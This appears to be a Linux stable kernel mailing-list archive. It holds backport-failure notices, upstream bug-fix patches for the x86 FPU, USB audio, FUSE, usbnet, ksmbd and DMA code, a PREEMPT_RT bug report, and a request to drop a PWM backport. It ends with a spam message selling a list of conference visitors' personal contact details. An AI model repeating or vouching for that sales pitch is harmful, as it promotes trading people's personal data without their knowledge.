git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081250-ominous-saddling-5ac5@gregkh' --subject-prefix 'PATCH 5.15.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 1cec9ac2d071cfd2da562241aab0ef701355762a Mon Sep 17 00:00:00 2001
From: Dave Hansen <dave.hansen(a)linux.intel.com>
Date: Tue, 24 Jun 2025 14:01:48 -0700
Subject: [PATCH] x86/fpu: Delay instruction pointer fixup until after warning
Right now, if XRSTOR fails a console message like this is be printed:
Bad FPU state detected at restore_fpregs_from_fpstate+0x9a/0x170, reinitializing FPU registers.
However, the text location (...+0x9a in this case) is the instruction
*AFTER* the XRSTOR. The highlighted instruction in the "Code:" dump
also points one instruction late.
The reason is that the "fixup" moves RIP up to pass the bad XRSTOR and
keep on running after returning from the #GP handler. But it does this
fixup before warning.
The resulting warning output is nonsensical because it looks like the
non-FPU-related instruction is #GP'ing.
Do not fix up RIP until after printing the warning. Do this by using
the more generic and standard ex_handler_default().
Fixes: d5c8028b4788 ("x86/fpu: Reinitialize FPU registers if restoring FPU state fails")
Signed-off-by: Dave Hansen <dave.hansen(a)linux.intel.com>
Reviewed-by: Chao Gao <chao.gao(a)intel.com>
Acked-by: Alison Schofield <alison.schofield(a)intel.com>
Acked-by: Peter Zijlstra (Intel) <peterz(a)infradead.org>
Cc:stable@vger.kernel.org
Link: https://lore.kernel.org/all/20250624210148.97126F9E%40davehans-spike.ostc.i…
diff --git a/arch/x86/mm/extable.c b/arch/x86/mm/extable.c
index bf8dab18be97..2fdc1f1f5adb 100644
--- a/arch/x86/mm/extable.c
+++ b/arch/x86/mm/extable.c
@@ -122,13 +122,12 @@ static bool ex_handler_sgx(const struct exception_table_entry *fixup,
static bool ex_handler_fprestore(const struct exception_table_entry *fixup,
struct pt_regs *regs)
{
- regs->ip = ex_fixup_addr(fixup);
-
WARN_ONCE(1, "Bad FPU state detected at %pB, reinitializing FPU registers.",
(void *)instruction_pointer(regs));
fpu_reset_from_exception_fixup();
- return true;
+
+ return ex_handler_default(fixup, regs);
}
/*
The patch below does not apply to the 5.10-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-5.10.y
git checkout FETCH_HEAD
git cherry-pick -x 8a15ca0ca51399b652b1bbb23b590b220cf03d62
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081244-epileptic-value-7d4e@gregkh' --subject-prefix 'PATCH 5.10.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 8a15ca0ca51399b652b1bbb23b590b220cf03d62 Mon Sep 17 00:00:00 2001
From: "Geoffrey D. Bennett" <g(a)b4.vu>
Date: Mon, 28 Jul 2025 19:00:35 +0930
Subject: [PATCH] ALSA: scarlett2: Add retry on -EPROTO from scarlett2_usb_tx()
During communication with Focusrite Scarlett Gen 2/3/4 USB audio
interfaces, -EPROTO is sometimes returned from scarlett2_usb_tx(),
snd_usb_ctl_msg() which can cause initialisation and control
operations to fail intermittently.
This patch adds up to 5 retries in scarlett2_usb(), with a delay
starting at 5ms and doubling each time. This follows the same approach
as the fix for usb_set_interface() in endpoint.c (commit f406005e162b
("ALSA: usb-audio: Add retry on -EPROTO from usb_set_interface()")),
which resolved similar -EPROTO issues during device initialisation,
and is the same approach as in fcp.c:fcp_usb().
Fixes: 9e4d5c1be21f ("ALSA: usb-audio: Scarlett Gen 2 mixer interface")
Closes: https://github.com/geoffreybennett/linux-fcp/issues/41
Cc: stable(a)vger.kernel.org
Signed-off-by: Geoffrey D. Bennett <g(a)b4.vu>
Link: https://patch.msgid.link/aIdDO6ld50WQwNim@m.b4.vu
Signed-off-by: Takashi Iwai <tiwai(a)suse.de>
diff --git a/sound/usb/mixer_scarlett2.c b/sound/usb/mixer_scarlett2.c
index 49eeb1444dce..15bbdafc4894 100644
--- a/sound/usb/mixer_scarlett2.c
+++ b/sound/usb/mixer_scarlett2.c
@@ -2351,6 +2351,8 @@ static int scarlett2_usb(
struct scarlett2_usb_packet *req, *resp = NULL;
size_t req_buf_size = struct_size(req, data, req_size);
size_t resp_buf_size = struct_size(resp, data, resp_size);
+ int retries = 0;
+ const int max_retries = 5;
int err;
req = kmalloc(req_buf_size, GFP_KERNEL);
@@ -2374,10 +2376,15 @@ static int scarlett2_usb(
if (req_size)
memcpy(req->data, req_data, req_size);
+retry:
err = scarlett2_usb_tx(dev, private->bInterfaceNumber,
req, req_buf_size);
if (err != req_buf_size) {
+ if (err == -EPROTO && ++retries <= max_retries) {
+ msleep(5 * (1 << (retries - 1)));
+ goto retry;
+ }
usb_audio_err(
mixer->chip,
"%s USB request result cmd %x was %d\n",
The FUSE protocol uses struct fuse_write_out to convey the return value of
copy_file_range, which is restricted to uint32_t. But the COPY_FILE_RANGE
interface supports a 64-bit size copies.
Currently the number of bytes copied is silently truncated to 32-bit, which
may result in poor performance or even failure to copy in case of
truncation to zero.
Reported-by: Florian Weimer <fweimer(a)redhat.com>
Closes: https://lore.kernel.org/all/lhuh5ynl8z5.fsf@oldenburg.str.redhat.com/
Fixes: 88bc7d5097a1 ("fuse: add support for copy_file_range()")
Cc: <stable(a)vger.kernel.org> # v4.20
Signed-off-by: Miklos Szeredi <mszeredi(a)redhat.com>
---
fs/fuse/file.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/fs/fuse/file.c b/fs/fuse/file.c
index 45207a6bb85f..4adcf09d4b01 100644
--- a/fs/fuse/file.c
+++ b/fs/fuse/file.c
@@ -2960,7 +2960,7 @@ static ssize_t __fuse_copy_file_range(struct file *file_in, loff_t pos_in,
.nodeid_out = ff_out->nodeid,
.fh_out = ff_out->fh,
.off_out = pos_out,
- .len = len,
+ .len = min_t(size_t, len, UINT_MAX & PAGE_MASK),
.flags = flags
};
struct fuse_write_out outarg;
--
2.49.0
Since 'bcs->Residue' has the data type '__le32', we must convert it to
the correct byte order of the CPU using this driver when assigning it to
the local variable 'residue'.
Cc: stable(a)vger.kernel.org
Fixes: 50a6cb932d5c ("USB: usb_storage: add ums-realtek driver")
Suggested-by: Alan Stern <stern(a)rowland.harvard.edu>
Signed-off-by: Thorsten Blum <thorsten.blum(a)linux.dev>
---
drivers/usb/storage/realtek_cr.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/drivers/usb/storage/realtek_cr.c b/drivers/usb/storage/realtek_cr.c
index 8a4d7c0f2662..758258a569a6 100644
--- a/drivers/usb/storage/realtek_cr.c
+++ b/drivers/usb/storage/realtek_cr.c
@@ -253,7 +253,7 @@ static int rts51x_bulk_transport(struct us_data *us, u8 lun,
return USB_STOR_TRANSPORT_ERROR;
}
- residue = bcs->Residue;
+ residue = le32_to_cpu(bcs->Residue);
if (bcs->Tag != us->tag)
return USB_STOR_TRANSPORT_ERROR;
--
2.50.1
Since 'bcs->Residue' has the data type '__le32', convert it to the
correct byte order of the CPU using this driver when assigning it to
the local variable 'residue'.
Cc: stable(a)vger.kernel.org
Fixes: 50a6cb932d5c ("USB: usb_storage: add ums-realtek driver")
Suggested-by: Alan Stern <stern(a)rowland.harvard.edu>
Acked-by: Alan Stern <stern(a)rowland.harvard.edu>
Signed-off-by: Thorsten Blum <thorsten.blum(a)linux.dev>
---
Resending this as a separate patch for backporting as requested by Greg.
Link to previous patch: https://lore.kernel.org/lkml/20250813101249.158270-6-thorsten.blum@linux.de…
---
drivers/usb/storage/realtek_cr.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/drivers/usb/storage/realtek_cr.c b/drivers/usb/storage/realtek_cr.c
index 8a4d7c0f2662..758258a569a6 100644
--- a/drivers/usb/storage/realtek_cr.c
+++ b/drivers/usb/storage/realtek_cr.c
@@ -253,7 +253,7 @@ static int rts51x_bulk_transport(struct us_data *us, u8 lun,
return USB_STOR_TRANSPORT_ERROR;
}
- residue = bcs->Residue;
+ residue = le32_to_cpu(bcs->Residue);
if (bcs->Tag != us->tag)
return USB_STOR_TRANSPORT_ERROR;
--
2.50.1
The patch below does not apply to the 5.4-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-5.4.y
git checkout FETCH_HEAD
git cherry-pick -x 8a15ca0ca51399b652b1bbb23b590b220cf03d62
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081244-chokehold-itunes-2e5a@gregkh' --subject-prefix 'PATCH 5.4.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 8a15ca0ca51399b652b1bbb23b590b220cf03d62 Mon Sep 17 00:00:00 2001
From: "Geoffrey D. Bennett" <g(a)b4.vu>
Date: Mon, 28 Jul 2025 19:00:35 +0930
Subject: [PATCH] ALSA: scarlett2: Add retry on -EPROTO from scarlett2_usb_tx()
During communication with Focusrite Scarlett Gen 2/3/4 USB audio
interfaces, -EPROTO is sometimes returned from scarlett2_usb_tx(),
snd_usb_ctl_msg() which can cause initialisation and control
operations to fail intermittently.
This patch adds up to 5 retries in scarlett2_usb(), with a delay
starting at 5ms and doubling each time. This follows the same approach
as the fix for usb_set_interface() in endpoint.c (commit f406005e162b
("ALSA: usb-audio: Add retry on -EPROTO from usb_set_interface()")),
which resolved similar -EPROTO issues during device initialisation,
and is the same approach as in fcp.c:fcp_usb().
Fixes: 9e4d5c1be21f ("ALSA: usb-audio: Scarlett Gen 2 mixer interface")
Closes: https://github.com/geoffreybennett/linux-fcp/issues/41
Cc: stable(a)vger.kernel.org
Signed-off-by: Geoffrey D. Bennett <g(a)b4.vu>
Link: https://patch.msgid.link/aIdDO6ld50WQwNim@m.b4.vu
Signed-off-by: Takashi Iwai <tiwai(a)suse.de>
diff --git a/sound/usb/mixer_scarlett2.c b/sound/usb/mixer_scarlett2.c
index 49eeb1444dce..15bbdafc4894 100644
--- a/sound/usb/mixer_scarlett2.c
+++ b/sound/usb/mixer_scarlett2.c
@@ -2351,6 +2351,8 @@ static int scarlett2_usb(
struct scarlett2_usb_packet *req, *resp = NULL;
size_t req_buf_size = struct_size(req, data, req_size);
size_t resp_buf_size = struct_size(resp, data, resp_size);
+ int retries = 0;
+ const int max_retries = 5;
int err;
req = kmalloc(req_buf_size, GFP_KERNEL);
@@ -2374,10 +2376,15 @@ static int scarlett2_usb(
if (req_size)
memcpy(req->data, req_data, req_size);
+retry:
err = scarlett2_usb_tx(dev, private->bInterfaceNumber,
req, req_buf_size);
if (err != req_buf_size) {
+ if (err == -EPROTO && ++retries <= max_retries) {
+ msleep(5 * (1 << (retries - 1)));
+ goto retry;
+ }
usb_audio_err(
mixer->chip,
"%s USB request result cmd %x was %d\n",
The patch below does not apply to the 5.15-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-5.15.y
git checkout FETCH_HEAD
git cherry-pick -x 8a15ca0ca51399b652b1bbb23b590b220cf03d62
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081243-disaster-wrinkly-bdc6@gregkh' --subject-prefix 'PATCH 5.15.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 8a15ca0ca51399b652b1bbb23b590b220cf03d62 Mon Sep 17 00:00:00 2001
From: "Geoffrey D. Bennett" <g(a)b4.vu>
Date: Mon, 28 Jul 2025 19:00:35 +0930
Subject: [PATCH] ALSA: scarlett2: Add retry on -EPROTO from scarlett2_usb_tx()
During communication with Focusrite Scarlett Gen 2/3/4 USB audio
interfaces, -EPROTO is sometimes returned from scarlett2_usb_tx(),
snd_usb_ctl_msg() which can cause initialisation and control
operations to fail intermittently.
This patch adds up to 5 retries in scarlett2_usb(), with a delay
starting at 5ms and doubling each time. This follows the same approach
as the fix for usb_set_interface() in endpoint.c (commit f406005e162b
("ALSA: usb-audio: Add retry on -EPROTO from usb_set_interface()")),
which resolved similar -EPROTO issues during device initialisation,
and is the same approach as in fcp.c:fcp_usb().
Fixes: 9e4d5c1be21f ("ALSA: usb-audio: Scarlett Gen 2 mixer interface")
Closes: https://github.com/geoffreybennett/linux-fcp/issues/41
Cc: stable(a)vger.kernel.org
Signed-off-by: Geoffrey D. Bennett <g(a)b4.vu>
Link: https://patch.msgid.link/aIdDO6ld50WQwNim@m.b4.vu
Signed-off-by: Takashi Iwai <tiwai(a)suse.de>
diff --git a/sound/usb/mixer_scarlett2.c b/sound/usb/mixer_scarlett2.c
index 49eeb1444dce..15bbdafc4894 100644
--- a/sound/usb/mixer_scarlett2.c
+++ b/sound/usb/mixer_scarlett2.c
@@ -2351,6 +2351,8 @@ static int scarlett2_usb(
struct scarlett2_usb_packet *req, *resp = NULL;
size_t req_buf_size = struct_size(req, data, req_size);
size_t resp_buf_size = struct_size(resp, data, resp_size);
+ int retries = 0;
+ const int max_retries = 5;
int err;
req = kmalloc(req_buf_size, GFP_KERNEL);
@@ -2374,10 +2376,15 @@ static int scarlett2_usb(
if (req_size)
memcpy(req->data, req_data, req_size);
+retry:
err = scarlett2_usb_tx(dev, private->bInterfaceNumber,
req, req_buf_size);
if (err != req_buf_size) {
+ if (err == -EPROTO && ++retries <= max_retries) {
+ msleep(5 * (1 << (retries - 1)));
+ goto retry;
+ }
usb_audio_err(
mixer->chip,
"%s USB request result cmd %x was %d\n",
The patch below does not apply to the 5.10-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-5.10.y
git checkout FETCH_HEAD
git cherry-pick -x 0d9cfc9b8cb17dbc29a98792d36ec39a1cf1395f
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081258-value-bobbing-e1b7@gregkh' --subject-prefix 'PATCH 5.10.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 0d9cfc9b8cb17dbc29a98792d36ec39a1cf1395f Mon Sep 17 00:00:00 2001
From: John Ernberg <john.ernberg(a)actia.se>
Date: Wed, 23 Jul 2025 10:25:35 +0000
Subject: [PATCH] net: usbnet: Avoid potential RCU stall on LINK_CHANGE event
The Gemalto Cinterion PLS83-W modem (cdc_ether) is emitting confusing link
up and down events when the WWAN interface is activated on the modem-side.
Interrupt URBs will in consecutive polls grab:
* Link Connected
* Link Disconnected
* Link Connected
Where the last Connected is then a stable link state.
When the system is under load this may cause the unlink_urbs() work in
__handle_link_change() to not complete before the next usbnet_link_change()
call turns the carrier on again, allowing rx_submit() to queue new SKBs.
In that event the URB queue is filled faster than it can drain, ending up
in a RCU stall:
rcu: INFO: rcu_sched detected expedited stalls on CPUs/tasks: { 0-.... } 33108 jiffies s: 201 root: 0x1/.
rcu: blocking rcu_node structures (internal RCU debug):
Sending NMI from CPU 1 to CPUs 0:
NMI backtrace for cpu 0
Call trace:
arch_local_irq_enable+0x4/0x8
local_bh_enable+0x18/0x20
__netdev_alloc_skb+0x18c/0x1cc
rx_submit+0x68/0x1f8 [usbnet]
rx_alloc_submit+0x4c/0x74 [usbnet]
usbnet_bh+0x1d8/0x218 [usbnet]
usbnet_bh_tasklet+0x10/0x18 [usbnet]
tasklet_action_common+0xa8/0x110
tasklet_action+0x2c/0x34
handle_softirqs+0x2cc/0x3a0
__do_softirq+0x10/0x18
____do_softirq+0xc/0x14
call_on_irq_stack+0x24/0x34
do_softirq_own_stack+0x18/0x20
__irq_exit_rcu+0xa8/0xb8
irq_exit_rcu+0xc/0x30
el1_interrupt+0x34/0x48
el1h_64_irq_handler+0x14/0x1c
el1h_64_irq+0x68/0x6c
_raw_spin_unlock_irqrestore+0x38/0x48
xhci_urb_dequeue+0x1ac/0x45c [xhci_hcd]
unlink1+0xd4/0xdc [usbcore]
usb_hcd_unlink_urb+0x70/0xb0 [usbcore]
usb_unlink_urb+0x24/0x44 [usbcore]
unlink_urbs.constprop.0.isra.0+0x64/0xa8 [usbnet]
__handle_link_change+0x34/0x70 [usbnet]
usbnet_deferred_kevent+0x1c0/0x320 [usbnet]
process_scheduled_works+0x2d0/0x48c
worker_thread+0x150/0x1dc
kthread+0xd8/0xe8
ret_from_fork+0x10/0x20
Get around the problem by delaying the carrier on to the scheduled work.
This needs a new flag to keep track of the necessary action.
The carrier ok check cannot be removed as it remains required for the
LINK_RESET event flow.
Fixes: 4b49f58fff00 ("usbnet: handle link change")
Cc: stable(a)vger.kernel.org
Signed-off-by: John Ernberg <john.ernberg(a)actia.se>
Link: https://patch.msgid.link/20250723102526.1305339-1-john.ernberg@actia.se
Signed-off-by: Jakub Kicinski <kuba(a)kernel.org>
diff --git a/drivers/net/usb/usbnet.c b/drivers/net/usb/usbnet.c
index c04e715a4c2a..bc1d8631ffe0 100644
--- a/drivers/net/usb/usbnet.c
+++ b/drivers/net/usb/usbnet.c
@@ -1122,6 +1122,9 @@ static void __handle_link_change(struct usbnet *dev)
* tx queue is stopped by netcore after link becomes off
*/
} else {
+ if (test_and_clear_bit(EVENT_LINK_CARRIER_ON, &dev->flags))
+ netif_carrier_on(dev->net);
+
/* submitting URBs for reading packets */
tasklet_schedule(&dev->bh);
}
@@ -2009,10 +2012,12 @@ EXPORT_SYMBOL(usbnet_manage_power);
void usbnet_link_change(struct usbnet *dev, bool link, bool need_reset)
{
/* update link after link is reseted */
- if (link && !need_reset)
- netif_carrier_on(dev->net);
- else
+ if (link && !need_reset) {
+ set_bit(EVENT_LINK_CARRIER_ON, &dev->flags);
+ } else {
+ clear_bit(EVENT_LINK_CARRIER_ON, &dev->flags);
netif_carrier_off(dev->net);
+ }
if (need_reset && link)
usbnet_defer_kevent(dev, EVENT_LINK_RESET);
diff --git a/include/linux/usb/usbnet.h b/include/linux/usb/usbnet.h
index 0b9f1e598e3a..4bc6bb01a0eb 100644
--- a/include/linux/usb/usbnet.h
+++ b/include/linux/usb/usbnet.h
@@ -76,6 +76,7 @@ struct usbnet {
# define EVENT_LINK_CHANGE 11
# define EVENT_SET_RX_MODE 12
# define EVENT_NO_IP_ALIGN 13
+# define EVENT_LINK_CARRIER_ON 14
/* This one is special, as it indicates that the device is going away
* there are cyclic dependencies between tasklet, timer and bh
* that must be broken
The patch below does not apply to the 5.15-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-5.15.y
git checkout FETCH_HEAD
git cherry-pick -x 8e7d178d06e8937454b6d2f2811fa6a15656a214
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081211-chirping-aversion-8b66@gregkh' --subject-prefix 'PATCH 5.15.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 8e7d178d06e8937454b6d2f2811fa6a15656a214 Mon Sep 17 00:00:00 2001
From: Thorsten Blum <thorsten.blum(a)linux.dev>
Date: Wed, 6 Aug 2025 03:03:49 +0200
Subject: [PATCH] smb: server: Fix extension string in
ksmbd_extract_shortname()
In ksmbd_extract_shortname(), strscpy() is incorrectly called with the
length of the source string (excluding the NUL terminator) rather than
the size of the destination buffer. This results in "__" being copied
to 'extension' rather than "___" (two underscores instead of three).
Use the destination buffer size instead to ensure that the string "___"
(three underscores) is copied correctly.
Cc: stable(a)vger.kernel.org
Fixes: e2f34481b24d ("cifsd: add server-side procedures for SMB3")
Signed-off-by: Thorsten Blum <thorsten.blum(a)linux.dev>
Acked-by: Namjae Jeon <linkinjeon(a)kernel.org>
Signed-off-by: Steve French <stfrench(a)microsoft.com>
diff --git a/fs/smb/server/smb_common.c b/fs/smb/server/smb_common.c
index 425c756bcfb8..b23203a1c286 100644
--- a/fs/smb/server/smb_common.c
+++ b/fs/smb/server/smb_common.c
@@ -515,7 +515,7 @@ int ksmbd_extract_shortname(struct ksmbd_conn *conn, const char *longname,
p = strrchr(longname, '.');
if (p == longname) { /*name starts with a dot*/
- strscpy(extension, "___", strlen("___"));
+ strscpy(extension, "___", sizeof(extension));
} else {
if (p) {
p++;
Hello Sasha,
On Fri, Aug 08, 2025 at 06:30:33PM -0400, Sasha Levin wrote:
> This is a note to let you know that I've just added the patch titled
>
> pwm: rockchip: Round period/duty down on apply, up on get
>
> to the 6.16-stable tree which can be found at:
> http://www.kernel.org/git/?p=linux/kernel/git/stable/stable-queue.git;a=sum…
>
> The filename of the patch is:
> pwm-rockchip-round-period-duty-down-on-apply-up-on-g.patch
> and it can be found in the queue-6.16 subdirectory.
>
> If you, or anyone else, feels it should not be added to the stable tree,
> please let <stable(a)vger.kernel.org> know about it.
>
>
>
> commit 51144efa3159cd95ab37e786c982822a060d7d1a
> Author: Nicolas Frattaroli <nicolas.frattaroli(a)collabora.com>
> Date: Mon Jun 16 17:14:17 2025 +0200
>
> pwm: rockchip: Round period/duty down on apply, up on get
>
> [ Upstream commit 0b4d1abe5ca568c5b7f667345ec2b5ad0fb2e54b ]
>
> With CONFIG_PWM_DEBUG=y, the rockchip PWM driver produces warnings like
> this:
>
> rockchip-pwm fd8b0010.pwm: .apply is supposed to round down
> duty_cycle (requested: 23529/50000, applied: 23542/50000)
>
> This is because the driver chooses ROUND_CLOSEST for purported
> idempotency reasons. However, it's possible to keep idempotency while
> always rounding down in .apply().
>
> Do this by making .get_state() always round up, and making .apply()
> always round down. This is done with u64 maths, and setting both period
> and duty to U32_MAX (the biggest the hardware can support) if they would
> exceed their 32 bits confines.
>
> Fixes: 12f9ce4a5198 ("pwm: rockchip: Fix period and duty cycle approximation")
> Fixes: 1ebb74cf3537 ("pwm: rockchip: Add support for hardware readout")
> Signed-off-by: Nicolas Frattaroli <nicolas.frattaroli(a)collabora.com>
> Link: https://lore.kernel.org/r/20250616-rockchip-pwm-rounding-fix-v2-1-a9c65acad…
> Signed-off-by: Uwe Kleine-König <ukleinek(a)kernel.org>
> Signed-off-by: Sasha Levin <sashal(a)kernel.org>
while the new code makes the driver match the PWM rules now, I'd be
conservative and not backport that patch because while I consider it a
(very minor) fix that's a change in behaviour and maybe people depend on
that old behaviour. So let's not break our user's workflows and reserve
that for a major release. Please drop this patch from your queue.
Best regards
Uwe
Hi,
On a PREEMPT_RT kernel based on v6.16-rc1, I hit the following splat:
| BUG: sleeping function called from invalid context at kernel/locking/spinlock_rt.c:48
| in_atomic(): 1, irqs_disabled(): 0, non_block: 0, pid: 20466, name: syz.0.1689
| preempt_count: 1, expected: 0
| RCU nest depth: 0, expected: 0
| Preemption disabled at:
| [<ffff800080241600>] debug_exception_enter arch/arm64/mm/fault.c:978 [inline]
| [<ffff800080241600>] do_debug_exception+0x68/0x2fc arch/arm64/mm/fault.c:997
| CPU: 0 UID: 0 PID: 20466 Comm: syz.0.1689 Not tainted 6.16.0-rc1-rt1-dirty #12 PREEMPT_RT
| Hardware name: QEMU KVM Virtual Machine, BIOS 2025.02-8 05/13/2025
| Call trace:
| show_stack+0x2c/0x3c arch/arm64/kernel/stacktrace.c:466 (C)
| __dump_stack+0x30/0x40 lib/dump_stack.c:94
| dump_stack_lvl+0x148/0x1d8 lib/dump_stack.c:120
| dump_stack+0x1c/0x3c lib/dump_stack.c:129
| __might_resched+0x2e4/0x52c kernel/sched/core.c:8800
| __rt_spin_lock kernel/locking/spinlock_rt.c:48 [inline]
| rt_spin_lock+0xa8/0x1bc kernel/locking/spinlock_rt.c:57
| spin_lock include/linux/spinlock_rt.h:44 [inline]
| force_sig_info_to_task+0x6c/0x4a8 kernel/signal.c:1302
| force_sig_fault_to_task kernel/signal.c:1699 [inline]
| force_sig_fault+0xc4/0x110 kernel/signal.c:1704
| arm64_force_sig_fault+0x6c/0x80 arch/arm64/kernel/traps.c:265
| send_user_sigtrap arch/arm64/kernel/debug-monitors.c:237 [inline]
| single_step_handler+0x1f4/0x36c arch/arm64/kernel/debug-monitors.c:257
| do_debug_exception+0x154/0x2fc arch/arm64/mm/fault.c:1002
| el0_dbg+0x44/0x120 arch/arm64/kernel/entry-common.c:756
| el0t_64_sync_handler+0x3c/0x108 arch/arm64/kernel/entry-common.c:832
| el0t_64_sync+0x1ac/0x1b0 arch/arm64/kernel/entry.S:600
It seems that commit eaff68b32861 ("arm64: entry: Add entry and exit functions
for debug exception") in 6.17-rc1, also present as 6fb44438a5e1 in mainline,
removed code that previously avoided sleeping context issues when handling
debug exceptions:
Link: https://git.kernel.org/pub/scm/linux/kernel/git/arm64/linux.git/commit/arch…
This appears to be triggered when force_sig_fault() is called from
debug exception context, which is not sleepable under PREEMPT_RT.
I understand that this path is primarily for debugging, but I would like
to discuss whether the patch needs some adjustment for PREEMPT_RT.
I also found that the issue can be reproduced depending on the changes
introduced by the following commit:
Link: https://github.com/torvalds/linux/commit/d8bb6718c4d
arm64: Make debug exception handlers visible from RCU
Make debug exceptions visible from RCU so that synchronize_rcu()
correctly tracks the debug exception handler.
This also introduces sanity checks for user-mode exceptions as same
as x86's ist_enter()/ist_exit().
The debug exception can interrupt in idle task. For example, it warns
if we put a kprobe on a function called from idle task as below.
The warning message showed that the rcu_read_lock() caused this
problem. But actually, this means the RCU lost the context which
was already in NMI/IRQ.
/sys/kernel/debug/tracing # echo p default_idle_call >> kprobe_events
/sys/kernel/debug/tracing # echo 1 > events/kprobes/enable
...
For reference:
- v5.2.10: https://elixir.bootlin.com/linux/v5.2.10/source/arch/arm64/mm/fault.c#L810
- v5.3-rc3: https://elixir.bootlin.com/linux/v5.3-rc3/source/arch/arm64/mm/fault.c#L787
Do we need to restore some form of non-sleeping signal delivery in debug
exception context for PREEMPT_RT, or is there another preferred fix?
Thanks,
Yunseong
The of_platform_populate() call at the end of the function has a
possible failure path, causing a resource leak.
Replace of_iomap() with devm_platform_ioremap_resource() to ensure
automatic cleanup of srom->reg_base.
This issue was detected by smatch static analysis:
drivers/memory/samsung/exynos-srom.c:155 exynos_srom_probe()warn:
'srom->reg_base' from of_iomap() not released on lines: 155.
Fixes: 8ac2266d8831 ("memory: samsung: exynos-srom: Add support for bank configuration")
Cc: stable(a)vger.kernel.org
Signed-off-by: Zhen Ni <zhen.ni(a)easystack.cn>
---
chanegs in v2:
- Update commit msg
---
drivers/memory/samsung/exynos-srom.c | 10 ++++------
1 file changed, 4 insertions(+), 6 deletions(-)
diff --git a/drivers/memory/samsung/exynos-srom.c b/drivers/memory/samsung/exynos-srom.c
index e73dd330af47..d913fb901973 100644
--- a/drivers/memory/samsung/exynos-srom.c
+++ b/drivers/memory/samsung/exynos-srom.c
@@ -121,20 +121,18 @@ static int exynos_srom_probe(struct platform_device *pdev)
return -ENOMEM;
srom->dev = dev;
- srom->reg_base = of_iomap(np, 0);
- if (!srom->reg_base) {
+ srom->reg_base = devm_platform_ioremap_resource(pdev, 0);
+ if (IS_ERR(srom->reg_base)) {
dev_err(&pdev->dev, "iomap of exynos srom controller failed\n");
- return -ENOMEM;
+ return PTR_ERR(srom->reg_base);
}
platform_set_drvdata(pdev, srom);
srom->reg_offset = exynos_srom_alloc_reg_dump(exynos_srom_offsets,
ARRAY_SIZE(exynos_srom_offsets));
- if (!srom->reg_offset) {
- iounmap(srom->reg_base);
+ if (!srom->reg_offset)
return -ENOMEM;
- }
for_each_child_of_node(np, child) {
if (exynos_srom_configure_bank(srom, child)) {
--
2.20.1
When CONFIG_DMA_DIRECT_REMAP is enabled, atomic pool pages are
remapped via dma_common_contiguous_remap() using the supplied
pgprot. Currently, the mapping uses
pgprot_dmacoherent(PAGE_KERNEL), which leaves the memory encrypted
on systems with memory encryption enabled (e.g., ARM CCA Realms).
This can cause the DMA layer to fail or crash when accessing the
memory, as the underlying physical pages are not configured as
expected.
Fix this by requesting a decrypted mapping in the vmap() call:
pgprot_decrypted(pgprot_dmacoherent(PAGE_KERNEL))
This ensures that atomic pool memory is consistently mapped
unencrypted.
Cc: stable(a)vger.kernel.org
Signed-off-by: Shanker Donthineni <sdonthineni(a)nvidia.com>
---
kernel/dma/pool.c | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/kernel/dma/pool.c b/kernel/dma/pool.c
index 7b04f7575796b..ee45dee33d491 100644
--- a/kernel/dma/pool.c
+++ b/kernel/dma/pool.c
@@ -102,8 +102,8 @@ static int atomic_pool_expand(struct gen_pool *pool, size_t pool_size,
#ifdef CONFIG_DMA_DIRECT_REMAP
addr = dma_common_contiguous_remap(page, pool_size,
- pgprot_dmacoherent(PAGE_KERNEL),
- __builtin_return_address(0));
+ pgprot_decrypted(pgprot_dmacoherent(PAGE_KERNEL)),
+ __builtin_return_address(0));
if (!addr)
goto free_page;
#else
--
2.25.1
Hi,
We are offering the visitors contact list International Broadcast Conference (IBC) 2025.
We currently have 50,656 verified visitor contacts.
Each contact contains: Contact name, Job Title, Business Name, Physical Address, Phone Numbers, Official Email address and many more…
Rest assured, our contacts are 100% opt-in and GDPR compliant, ensuring the utmost integrity in your outreach.
